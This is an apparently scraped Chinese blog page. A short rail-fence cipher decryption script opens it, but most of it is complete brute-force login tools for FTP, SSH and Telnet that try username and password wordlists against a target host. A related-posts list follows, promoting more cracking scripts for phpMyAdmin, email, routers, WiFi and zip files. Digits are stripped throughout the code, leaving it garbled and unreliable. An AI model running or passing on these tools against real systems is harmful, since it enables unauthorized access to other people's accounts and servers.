Python脚本暴力破解栅栏密码
今天遇到一个要破解的栅栏密码,先给大家介绍通用的脚本。
方法一(通用脚本):
#!/usr/bin/env python
# -*- coding: gbk -*-
# -*- coding: utf_ -*-
e = raw_input(‘请输入要解密的字符串\n‘)
elen = len(e)
field=[]
for i in range(,elen):
if(elen%i==):
field.append(i)
for f in field:
b = elen / f
result = {x:‘‘ for x in range(b)}
for i in range(elen):
a = i % b;
result.update({a:result[a] + e[i]})
d = ‘‘
for i in range(b):
d = d + result[i]
print ‘分为\t‘+str(f)+‘\t‘+‘栏时,解密结果为: ‘+d
方法二:
FTP暴力破解脚本
#!/usr/bin/env python
#-*-coding = utf--*-
#author:@xfk
#blog:@blog.sina.com.cn/kaiyongdeng
#date:@--
import sys, os, time
from ftplib import FTP
docs = """
[*] This was written for educational purpose and pentest only. Use it at your own risk.
[*] Author will be not responsible for any damage!
[*] Toolname : ftp_bf.py
[*] Coder :
[*] Version : .
[*] eample of use : python ftp_bf.py -t ftp.server.com -u usernames.txt -p passwords.txt
"""
if sys.platform == 'linux' or sys.platform == 'linux':
clearing = 'clear'
else:
clearing = 'cls'
os.system(clearing)
R = "\[m";
G = "\[m";
Y = "\[m"
END = "\[m"
def logo():
print G+"\n |---------------------------------------------------------------|"
print " | |"
print " | blog.sina.com.cn/kaiyongdeng |"
print " | // ftp_bf.py v.. |"
print " | FTP Brute Forcing Tool |"
print " | |"
print " |---------------------------------------------------------------|\n"
print " \n [-] %s\n" % time.strftime("%X")
print docs+END
def help():
print R+"[*]-t, --target ip/hostname <> Our target"
print "[*]-u, --usernamelist usernamelist <> usernamelist path"
print "[*]-p, --passwordlist passwordlist <> passwordlist path"
print "[*]-h, --help help <> print this help"
print "[*]Example : python ftp_bf -t ftp.server.com -u username.txt -p passwords.txt"+END sys.exit()
def bf_login(hostname,username,password):
# sys.stdout.write("\r[!]Checking : %s " % (p))
# sys.stdout.flush()
try:
ftp = FTP(hostname)
ftp.login(hostname,username, password)
ftp.retrlines('list')
ftp.quit()
print Y+"\n[!] wt,wt!!! We did it ! "
print "[+] Target : ",hostname, ""
print "[+] User : ",username, ""
print "[+] Password : ",password, ""+END
return
# sys.exit()
except Exception, e:
pass except KeyboardInterrupt: print R+"\n[-] Exiting ...\n"+END
sys.exit()
def anon_login(hostname):
try:
print G+"\n[!] Checking for anonymous login.\n"+END
ftp = FTP(hostname) ftp.login()
ftp.retrlines('LIST')
print Y+"\n[!] wt,wt!!! Anonymous login successfuly !\n"+END
ftp.quit()
except Exception, e:
print R+"\n[-] Anonymous login failed...\n"+END
pass
def main():
logo()
try:
for arg in sys.argv:
if arg.lower() == '-t' or arg.lower() == '--target':
hostname = sys.argv[int(sys.argv[:].index(arg))+]
elif arg.lower() == '-u' or arg.lower() == '--usernamelist':
usernamelist = sys.argv[int(sys.argv[:].index(arg))+]
elif arg.lower() == '-p' or arg.lower() == '--passwordlist':
passwordlist = sys.argv[int(sys.argv[:].index(arg))+]
elif arg.lower() == '-h' or arg.lower() == '--help':
help()
elif len(sys.argv) <= :
help()
except:
print R+"[-]Cheak your parametars input\n"+END
help()
print G+"[!] BruteForcing target ..."+END
anon_login(hostname)
# print "here is ok"
# print hostname
try:
usernames = open(usernamelist, "r")
user = usernames.readlines()
count =
while count < len(user):
user[count] = user[count].strip()
count +=
except:
print R+"\n[-] Cheak your usernamelist path\n"+END
sys.exit()
# print "here is ok ",usernamelist,passwordlist
try:
passwords = open(passwordlist, "r")
pwd = passwords.readlines()
count =
while count < len(pwd):
pwd[count] = pwd[count].strip()
count +=
except:
print R+"\n[-] Check your passwordlist path\n"+END
sys.exit()
print G+"\n[+] Loaded:",len(user),"usernames"
print "\n[+] Loaded:",len(pwd),"passwords"
print "[+] Target:",hostname
print "[+] Guessing...\n"+END
for u in user: for p in pwd:
result = bf_login(hostname,u.replace("\n",""),p.replace("\n",""))
if result != :
print G+"[+]Attempt uaername:%s password:%s..." % (u,p) + R+"Disenable"+END
else:
print G+"[+]Attempt uaername:%s password:%s..." % (u,p) + Y+"Enable"+END
if not result :
print R+"\n[-]There is no username ans password enabled in the list."
print "[-]Exiting...\n"+END
if __name__ == "__main__":
main()
SSH暴力破解
#!/usr/bin/env python
#-*-coding = UTF--*-
#author@:dengyongkai
#blog@:blog.sina.com.cn/kaiyongdeng
import sys
import os
import time
#from threading import Thread
try:
from paramiko import SSHClient
from paramiko import AutoAddPolicy
except ImportError:
print G+'''
You need paramiko module.
http://www.lag.net/paramiko/
Debian/Ubuntu: sudo apt-get install aptitude
: sudo aptitude install python-paramiko\n'''+END
sys.exit()
docs = """
[*] This was written for educational purpose and pentest only. Use it at your own risk.
[*] Author will be not responsible for any damage!
[*] Toolname : ssh_bf.py
[*] Author : xfk
[*] Version : v..
[*] Example of use : python ssh_bf.py [-T target] [-P port] [-U userslist] [-W wordlist] [-H help]
"""
if sys.platform == 'linux' or sys.platform == 'linux':
clearing = 'clear'
else:
clearing = 'cls'
os.system(clearing)
R = "\[m";
G = "\[m";
Y = "\[m"
END = "\[m"
def logo():
print G+"\n |---------------------------------------------------------------|"
print " | |"
print " | blog.sina.com.cn/kaiyongdeng |"
print " | // ssh_bf.py v.. |"
print " | SSH Brute Forcing Tool |"
print " | |"
print " |---------------------------------------------------------------|\n"
print " \n [-] %s\n" % time.ctime()
print docs+END
def help():
print Y+" [*]-H --hostname/ip <>the target hostname or ip address"
print " [*]-P --port <>the ssh service port(default is )"
print " [*]-U --usernamelist <>usernames list file"
print " [*]-P --passwordlist <>passwords list file"
print " [*]-H --help <>show help information"
print " [*]Usage:python %s [-T target] [-P port] [-U userslist] [-W wordlist] [-H help]"+END
sys.exit()
def BruteForce(hostname,port,username,password):
'''
Create SSH connection to target
'''
ssh = SSHClient()
ssh.set_missing_host_key_policy(AutoAddPolicy())
try:
ssh.connect(hostname, port, username, password, pkey=None, timeout = None, allow_agent=False, look_for_keys=False)
status = 'ok'
ssh.close()
except Exception, e:
status = 'error'
pass
return status
def makelist(file):
'''
Make usernames and passwords lists
'''
items = []
try:
fd = open(file, 'r')
except IOError:
print R+'unable to read file \'%s\'' % file+END
pass
except Exception, e:
print R+'unknown error'+END
pass
for line in fd.readlines():
item = line.replace('\n', '').replace('\r', '')
items.append(item)
fd.close()
return items
def main():
logo()
# print "hello wold"
try:
for arg in sys.argv:
if arg.lower() == '-t' or arg.lower() == '--target':
hostname = str(sys.argv[int(sys.argv[:].index(arg))+])
if arg.lower() == '-p' or arg.lower() == '--port':
port = sys.argv[int(sys.argv[:].index(arg))+]
elif arg.lower() == '-u' or arg.lower() == '--userlist':
userlist = sys.argv[int(sys.argv[:].index(arg))+]
elif arg.lower() == '-w' or arg.lower() == '--wordlist':
wordlist = sys.argv[int(sys.argv[:].index(arg))+]
elif arg.lower() == '-h' or arg.lower() == '--help':
help()
elif len(sys.argv) <= :
help()
except:
print R+"[-]Cheak your parametars input\n"+END
help()
print G+"\n[!] BruteForcing target ...\n"+END
# print "here is ok"
# print hostname,port,wordlist,userlist
usernamelist = makelist(userlist)
passwordlist = makelist(wordlist)
print Y+"[*] SSH Brute Force Praparing."
print "[*] %s user(s) loaded." % str(len(usernamelist))
print "[*] %s password(s) loaded." % str(len(passwordlist))
print "[*] Brute Force Is Starting......."+END
try:
for username in usernamelist:
for password in passwordlist:
print G+"\n[+]Attempt uaername:%s password:%s..." % (username,password)+END
current = BruteForce(hostname, port, username, password)
if current == 'error':
print R+"[-]O*O The username:%s and password:%s Is Disenbabled...\n" % (username,password)+END
# pass
else:
print G+"\n[+] ^-^ HaHa,We Got It!!!"
print "[+] username: %s" % username
print "[+] password: %s\n" % password+END
# sys.exit()
except:
print R+"\n[-] There Is Something Wrong,Pleace Cheak It."
print "[-] Exitting.....\n"+END
raise
print Y+"[+] Done.^-^\n"+END
sys.exit()
if __name__ == "__main__":
main()
TELNET密码暴力破解
#!usr/bin/python
#Telnet Brute Forcer
#http://www.darkcde.com
#dhydr[at]gmail[dot]com
import threading, time, random, sys, telnetlib
from copy import copy
if len(sys.argv) !=:
print "Usage: ./telnetbrute.py <server> <userlist> <wordlist>"
sys.exit()
try:
users = open(sys.argv[], "r").readlines()
except(IOError):
print "Error: Check your userlist path\n"
sys.exit()
try:
words = open(sys.argv[], "r").readlines()
except(IOError):
print "Error: Check your wordlist path\n"
sys.exit()
print "\n\t dhydr[at]gmail[dot]com TelnetBruteForcer v."
print "\t--------------------------------------------------\n"
print "[+] Server:",sys.argv[]
print "[+] Users Loaded:",len(users)
print "[+] Words Loaded:",len(words),"\n"
wordlist = copy(words)
def reloader():
for word in wordlist:
words.append(word)
def getword():
lock = threading.Lock()
lock.acquire()
if len(words) != :
value = random.sample(words, )
words.remove(value[])
else:
print "\nReloading Wordlist - Changing User\n"
reloader()
value = random.sample(words, )
users.remove(users[])
lock.release()
if len(users) ==:
return value[][:-], users[]
else:
return value[][:-], users[][:-]
class Worker(threading.Thread):
def run(self):
value, user = getword()
try:
print "-"*
print "User:",user,"Password:",value
tn = telnetlib.Telnet(sys.argv[])
tn.read_until("login: ")
tn.write(user + "\n")
if password:
tn.read_until("Password: ")
tn.write(value + "\n")
tn.write("ls\n")
tn.write("exit\n")
print tn.read_all()
print "\t\nLogin successful:",value, user
tn.close()
work.join()
sys.exit()
except:
pass
for I in range(len(words)*len(users)):
work = Worker()
work.start()
time.sleep()
相关推荐
-
Python压缩解压缩zip文件及破解zip文件密码的方法
python 的 zipfile 提供了非常便捷的方法来压缩和解压 zip 文件. 例如,在py脚本所在目录中,有如下文件: readability/readability.js readability/readability.txt readability/readability-print.css readability/sprite-readability.png readability/readability.css 将 readability 目录中的文件压缩到脚本所在目录的 read
-
Python写的PHPMyAdmin暴力破解工具代码
PHPMyAdmin暴力破解,加上CVE-2012-2122 MySQL Authentication Bypass Vulnerability漏洞利用. #!/usr/bin/env python import urllib import urllib2 import cookielib import sys import subprocess def Crack(url,username,password): opener = urllib2.build_opener(urllib2.HTT
-
python编写暴力破解FTP密码小工具
python具体强大的库文件,很多功能都有相应的库文件,所以很有必要进行学习一下,其中有一个ftp相应的库文件ftplib,我们只需要其中的登录功能,然后利用多线程调用相应字典里面的字段进行登录,还能根据自己的需要,根据自身的情况编写需要的程序,让程序代替我们去做一些枯燥的重复工作. 下面直接上代码,下面是主文件 复制代码 代码如下: import os import time import threading class mythread(threading.Thread): def __in
-
Python实现在线暴力破解邮箱账号密码功能示例【测试可用】
本文实例讲述了Python实现在线暴力破解邮箱账号密码功能.分享给大家供大家参考,具体如下: dic 字典格式如下(mail.txt) : username@gmail.com:password username@gmail.com:password username@gmail.com:password 以此类推,切记保存成utf-8编码格式. 放置在当前脚本目录,也可自己定义修改. 支持ssl https /imap协议. # version 3.4.0 # coding='UTF-8' #
-
python实现多线程暴力破解登陆路由器功能代码分享
运行时请在其目录下添加user.txt passwd.txt两文件.否则会报错.程序没有加异常处理.代码比较挫..... 复制代码 代码如下: #coding:utf-8- import base64 import urllib2 import Queue import threading,re,sys queue = Queue.Queue() class Rout_thread(threading.Thread): def __init__(self,queue,passwd): threa
-
忘记ftp密码使用python ftplib库暴力破解密码的方法示例
python具体强大的库文件,很多功能都有相应的库文件,所以很有必要进行学习一下,其中有一个ftp相应的库文件ftplib,我们只需要其中的登录功能,然后利用多线程调用相应字典里面的字段进行登录,还能根据自己的需要,根据自身的情况编写需要的程序,让程序代替我们去做一些枯燥的重复工作. 下面直接上代码,下面是主文件 复制代码 代码如下: import os import time import threading class mythread(threading.Thread): def __in
-
Python脚本暴力破解栅栏密码
今天遇到一个要破解的栅栏密码,先给大家介绍通用的脚本. 方法一(通用脚本): #!/usr/bin/env python # -*- coding: gbk -*- # -*- coding: utf_ -*- e = raw_input('请输入要解密的字符串\n') elen = len(e) field=[] for i in range(,elen): if(elen%i==): field.append(i) for f in field: b = elen / f result =
-
Python实现暴力破解wifi密码并打包成exe
目录 前言 功能点预览 前置准备-依赖库 Python tkinter编写GUI界面 密码字典 开撸 打包成exe 演示 PS 前言 python号称是编程界的万金油,那么是否可以做个读取电脑网卡wifi并暴力破解的小脚本呢?在这个基础上为了方便体验是不是可以将其打包成exe这样方便执行的小应用呢? 说干就干~ 功能点预览 本文主要分享以下需求 python获取无线网卡 python通过无线网卡获取wifi python暴力破解wifi python 通过实现GUI图形界面 python打包成e
-
Python实现暴力破解有密码的zip文件的方法
背景 今天朋友给我发了一个某游戏的兑换码,压缩文件发过来的.结果被加密了.wc?还说叫爸爸就给我密码?男人是这么容易像恶势力低头的?直接给你爆了好吧,小兔崽子. 一.思路 爆密码的思路其实都大同小异:无非就是字典爆破,就看你是有现成密码字典,还是自己生成密码字典,然后进行循环输入密码,直到输入正确位置.现在很多都有防爆破限制,根本无法进行暴力破解,但是似乎zip这种大家都是用比较简单的密码而且没有什么限制. 因此 实现思路就是 生成字典->输入密码->成功解压 二.实现过程 1.生成字典 生成
-
python编写暴力破解zip文档程序的实例讲解
编写暴力破解Zip文件要从学习zipfile库的使用方法入手,首先打开Python解释器,用help('zipfile')命令来了解这个库并重点看一下ZipFile类中的extractall()这个方法 ZipFile extractall() 让我们来写一个脚本测试一下Zip文件库的用法,首先创建一个有密码的压缩文件,这里设置密码为awd,文件名为evil.zip,要解压这个zip文件,实例化一个新的ZipFile类,使用extractall()方法,在可选参数pwd上填上密码 运行后你会发现
-
Java编程实现暴力破解WIFI密码的方法分析
本文实例讲述了Java编程实现暴力破解WIFI密码的方法.分享给大家供大家参考,具体如下: 开始进入正题.在网上找了很多wifi破解工具,都是linux平台下用的,然后还不支持虚拟机装linux.因为很多笔记本装虚拟机都识别不了内置网卡.所以得把系统刻到U盘,然后用U盘启动.但是我现在穷得连一条内裤都没有了,哪来的U盘啊.于是就决定自己写,而且还得用Java写,写了我还得在windows上运行. 一.准备工作 首先你得需要一台能连wifi的电脑, 然后你的电脑得支持Java环境, 最后你周围得有
-
Python利用字典破解WIFI密码的方法
最近看到网上的一些作品,然后进行一些完善.只是用于学习,不要去干坏事哦.程序来源于网,我只是做了一些优化.当然这种方法破解还是有点慢哦.我用的python 3.6.5 既然要破解wifi,那么连接wifi的模块首先要有的,我们要导入pywifi模块. 有些同学可能没有这个,如果直接通过pip安装的话,可能不能用,听说这个wifi模块被停用了,所以大家如果通过pip安装的不行,那么就下载我提供的. 链接:https://pan.baidu.com/s/1rn-5F1CS5UXOTcLh3QAMhg
-
Python中FTP服务与SSH登录暴力破解的实现
目录 前言 SSH爆破 脚本演示 信号量类 with 用法 FTP爆破 服务搭建 匿名扫描 暴力破解 总结 前言 本文继续学习下 Python 编程在网络攻防领域的应用,主要是通过 Python 脚本进行 SSH 登录爆破和 FTP 服务登录爆破. SSH爆破 演示环境借助 Kali 虚拟机进行自身的 SSH 服务的登录爆破,注意提前修改/etc/ssh/sshd_config配置文件并执行命令service ssh start运行 SSH 服务. 脚本演示 先来看看代码: from pexpe
-
python生成遍历暴力破解密码的方法
python生成遍历暴力破解密码(这里已遍历暴力破解rar为例,只提供生成密码以及遍历密码) 这个也就是提供一个思路,需求是这样的,我XX的闺蜜有个rar的压缩包,不知道他是从哪里挣来的,说这个对他比较重要,但是有密码打不开,唉,可怜了我的电脑了 因为这个是暴力破解,是吧所有的密码进行的遍历,也就是从1到....无穷的列举出来,然后按个密码去撞,撞开了就开了,建议大家买个云服务器进行破解哈,因像这种的第一,不知道密码是几位的,第二还有特殊符号的,唉,破解时间太长了,就用8位密码来说把,全部8位测